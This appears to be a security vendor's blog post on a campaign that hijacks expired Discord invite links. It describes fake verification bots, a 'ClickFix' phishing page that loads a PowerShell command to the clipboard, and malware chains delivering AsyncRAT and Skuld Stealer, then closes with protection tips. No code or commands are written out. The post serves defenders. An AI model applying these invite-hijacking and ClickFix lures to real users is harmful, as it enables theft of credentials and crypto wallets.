• Attackers took advantage of a Discord feature that lets expired or deleted invite links be reused, allowing them to hijack trusted community links and redirect users to harmful servers.
  • The attack tricks users with a fake verification bot and phishing site that look like legitimate Discord servers, leading victims to unknowingly run harmful commands that download malware on their computer.
  • The malware spreads quietly in multiple steps using popular, trusted services like GitHub and Pastebin to hide its activity and avoid detection.
  • The attackers mainly target cryptocurrency users and aim to make money by stealing credentials and wallet information from victims around the world. Over 1,300 downloads were tracked, with victims spanning multiple countries including the U.S., Vietnam, France, Germany, the UK, and more, highlighting the global scale and financial motivation behind the campaign.
Introduction

Discord is a widely used and trusted platform favored by gamers, communities, businesses, and others who need to connect securely and quickly. In our recent research, Check Point Research (CPR) uncovered a flaw in Discord’s invitation system that allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers. Invitation links posted by trusted communities months ago on forums, social media, or official websites could now quietly lead users into the hands of cyber criminals.

CPR observed real-world attacks in which threat actors leveraged hijacked links to deploy sophisticated phishing schemes and malware campaigns. These included multi-stage infections that evaded detection by antivirus tools and sandbox checks, ultimately delivering malware like AsyncRAT and Skuld Stealer. This blog will detail the attack and share practical tips to remain protected from such attacks.

For in-depth technical details, see our full research report.

The Hidden Risk in Discord Invite Links

Discord offers several types of invite links: temporary, permanent, and vanity (custom) links. Temporary links expire after a set time, permanent links never expire, while vanity links are custom URLs available only to servers with premium (Level 3 Boost) status.

Our investigation revealed that attackers can exploit the way Discord manages expired or deleted invite codes—especially vanity links. When a custom invite link expires or a server loses its boosted status, the invite code can become available again. Attackers can then claim the same code and redirect users to a malicious server.

In many cases, users encounter these links in old, trusted sources and have no reason to suspect anything is wrong. To make things worse, the Discord app sometimes gives users the false impression that temporary links have been made permanent, which contributes to the pool of hijackable codes.

From Trusted Links to Malicious Servers

Once an invite link is hijacked, attackers redirect users to malicious servers that mimic legitimate Discord ones. Newcomers typically find that most channels are locked, except for one called “verify.” Here, a fake bot named “Safeguard” prompts users to complete a verification step.

Malicious Discord server where users land after clicking a hijacked invite link.

Clicking “verify” initiates an OAuth2 flow and redirects users to a phishing site that closely resembles Discord. The site preloads a malicious PowerShell command to the clipboard and guides users through a fake verification process. This technique, known as “ClickFix,” tricks users into running the command via the Windows Run dialog.

Once executed, the PowerShell script downloads additional components from Pastebin and GitHub, initiating a multi-stage infection chain. Ultimately, the system is infected with payloads including AsyncRAT, which gives attackers remote control, and Skuld Stealer which targets browser credentials and cryptocurrency wallets.

Infection chain overview: From PowerShell to final malware payload delivery.

An Expanding and Evolving Campaign

This campaign isn’t static. We’ve seen attackers periodically update their downloader to maintain a zero-detection rate on VirusTotal. We also identified a parallel campaign targeting gamers. Here, the initial loader was embedded in a Trojanized cheat tool for The Sims 4, demonstrating the attackers’ flexibility in targeting different user groups.

Impact and Reach

Exact victim counts are hard to determine due to the stealthy use of Discord webhooks for data exfiltration. However, download stats from repositories used in the campaign show over 1,300 downloads. Victims were spread across the globe, including in the U.S., Vietnam, France, Germany, the UK, and other countries.

The focus on stealing credentials and crypto wallet data indicates a clear financial motivation behind the attack.

A Trusted Platform Turned Attack Vector

This campaign illustrates how a subtle feature of Discord’s invite system can be weaponized. By hijacking trusted links, attackers created an effective attack chain that combined social engineering with abuse of legitimate services like GitHub, Bitbucket, and Pastebin.

Instead of using heavy obfuscation, the threat actors relied on simpler, stealthier techniques like behavior-based execution, scheduled tasks, and delayed payload decryption.

This campaign highlights the increasing sophistication of social engineering attacks that hijack user trust. Rather than relying on heavily obfuscated malware, attackers used legitimate services and simple behavioral tricks to evade detection, showing just how easily popular platforms can be manipulated when basic features—like invite link handling—are left unsecured.

Discord has since disabled the malicious bot used in this campaign, but the core tactics remain viable. Attackers can easily register new bots or switch vectors while continuing to exploit the invite system.

Stay Protected
  1. Doublecheck invite links – Always inspect Discord invite URLs before clicking. If a link comes from an old source (e.g., a forum post or tweet), verify its legitimacy first.
  2. Favor permanent invite links – When managing your own Discord servers, generate permanent (never-expiring) invite links. Avoid posting temporary invites publicly.
  3.  Check the “Verified App” badge before authorizing bots – Only interact with bots that display Discord’s official “Verified App” badge. Unverified bots may be malicious.
  4. Never run unknown commands – No legitimate Discord server or verification process should require you to run PowerShell commands or paste anything into your system terminal. Stop and investigate if prompted to do so.
  5. Adopt layered defenses – For organizations, combine security awareness training with endpoint protection, phishing detection, and browser security tools that can stop threats before they execute.
  6. Leverage proactive protection: Check Point Threat Emulation provides real-time prevention against advanced malware, phishing tactics, and file-based threats like the ones used in this campaign—across web, email, and collaboration tools. Its behavioral analysis and sandboxing capabilities offer critical protection against evolving social engineering and multi-stage malware attacks.

For in-depth technical details, see our full research report.

You may also like